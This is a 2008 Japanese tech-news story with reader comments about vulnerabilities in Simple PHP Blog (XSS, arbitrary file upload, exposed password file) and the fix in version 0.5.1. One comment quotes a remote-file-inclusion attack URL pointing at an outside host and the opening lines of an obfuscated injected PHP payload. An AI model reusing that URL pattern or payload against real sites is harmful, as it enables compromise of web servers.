パスワードを忘れた? アカウント作成
31496 story
PHP

Simple PHP blogに深刻な脆弱性 8

ストーリー by hylom

あるAnonymous Coward 曰く、

yahoo!ウェブホスティング(ライトコース)からの注意喚起メールにて知ったのだが、Simple PHP Blogに深刻な脆弱性が発見されている

この注意喚起メールによると、起こり得る事態として

  • 掲示板管理者権限奪取
  • 情報漏えい
  • サイト改ざん
  • ファイル消去
  • SPAM踏み台
  • ウィルス感染
があるそうで、インストールしているだけでこのような事態が起こりうるとのこと。Simple PHP Blogのプロジェクトページにあたってみたが、特にそれに該当すると思われる記述は見当たらず、詳細はよく分からない。Yahoo!側から指示された対策はMovable Typeへの乗り換え。Yahoo!がSimple PHP Blogの導入支援を行っていたのはライトコースのみであり、このコースで契約するユーザー層への指示としては合理的であるとも思われる。

Simple PHP BlogはGPLで配布されているものであり、利用している人もいるだろう。対策が必要となるかもしれない。詳細情報などお持ちの方はコメントで補足してもらえるとありがたい。
この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
  • by deaf_ear (31391) on 2008年07月31日 18時04分 (#1394502) 日記
    http://www.simplephpblog.com/comments.php?y=07&m=09&entry=entr... [simplephpblog.com]
    http://www.securityfocus.com/archive/1/480569/30/30/threaded [securityfocus.com]

    (a) Cross Site Scripting (XSS)
    Mutiple reflected XSS have been found in the "\themes\\user_style.php" file.

    (b) Arbitrary File Upload Vulnerability
    Simple PHP Blog is prone to an arbitrary file upload flaw because the application fails to check the upload denied files.
    In the file "upload_img_cgi.php" there's the following file content/extension check:

    PHPはよく知りませんので、以上です。
    --
    がんばろう。と自分に言い聞かせる。
    • by deaf_ear (31391) on 2008年07月31日 23時39分 (#1394714) 日記
      一次情報だけでは何ですので、検索してみました。
      先ほどのはWebページから辿れ、配布バージョンと比較した2007年のですし。

      このソフトウェアって...
      「安全なウェブサイトの作り方」(PDF英語版) [ipa.go.jp]
      を届けてあげたらどうでしょう。ってぐらい、アレですね。
      クラックする側にとっては"とっても"簡単な部類に必ず入りますね。きっと。

      サイト証明ちょっとアレなのですが。
      https://www.netsecurity.ne.jp/6_10110.html [netsecurity.ne.jp]
      ▽Simple PHP Blog---------------------------------------------------
      Simple PHP Blogは、user_style.phpスクリプトがユーザ入力を適切にチェックしていないことが原因でクロスサイトスクリプティングを実行されるセキュリティホールが存在する。この問題が悪用されると、リモートの攻撃者にクッキーベースの認証資格証明を奪取される可能性がある。
      2007/09/27 登録

      危険度:中
      影響を受けるバージョン:0.5.0.1未満
      影響を受ける環境:UNIX、Linux、Windows
      回避策:0.5.1以降へのバージョンアップ

      https://netsecurity.data-hotel.net/6_4091.html [data-hotel.net]
      ▽ Simple PHP Blog---------------------------------------------------
      Simple PHP Blogは、ユーザ資格証明をconfig/password.txtファイルにストアすることなどが原因で複数のセキュリティホールが存在する。この問題が悪用されると、リモートの攻撃者に暗号化されたユーザ名やパスワードといった機密情報を奪取されたり悪意あるファイルをアップロードされる可能性がある。 [更新]
      2005/07/14 登録、2005/08/29 更新

      危険度:中
      影響を受けるバージョン:0.4.0
      影響を受ける環境:UNIX、Linux、Windows
      回避策:公表されていません
      --
      がんばろう。と自分に言い聞かせる。
      親コメント
    • http://www.securityfocus.com/archive/1/480569/30/30/threaded [securityfocus.com] の末尾にある FIX INFORMATION に Released: SimplePHPBlog 0.5.1 [simplephpblog.com] が示されています。
      親コメント
    • by Anonymous Coward
      匿名の臆病者より :-)

      index.phpに引数としてinjectorが置いてあるページを指定してアクセス。
      何らかの情報を獲得しているようです。
      #例 http://www.aaa.ccc.com/index.php?s=http://www.injection.com/injection.txt? 等

      ちなみに、injection.txtの内容は以下の通りです。。
      <? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
      error_reporting(0); ignore_user_abort(); function hc8a89c2c306fb($p341be97d9aff9) { $p341be97d9aff9 = str_replace(" ", "", $p341be97d9aff9);
  • えーと、たしかPHPのsafe-modeがオフになってないと満足にうごかなかったような記憶があるので
    早々に撤退した記憶があります。
    検索してもYahooのサイトが多分上のほうに出てくるので、日本じゃそんなに人気ないかな。
    海外だとどうなんだろう…?
    • DBつかわないから(ある意味)安心だったのですよね
      当時RSS乗っ取りにやられた覚えがあります。また使ってみようかと思ってた矢先でした。

      # 以下当時の感想なので古いかも
      PHP3でも動きそうなPHP非推奨になった過去の機能を使ってるような感じな部分もあったし、
      PHP5向けに書き直したらだいぶマシになるんじゃなかろうかなんて思う節も。
typodupeerror

あと、僕は馬鹿なことをするのは嫌いですよ (わざとやるとき以外は)。-- Larry Wall

読み込み中...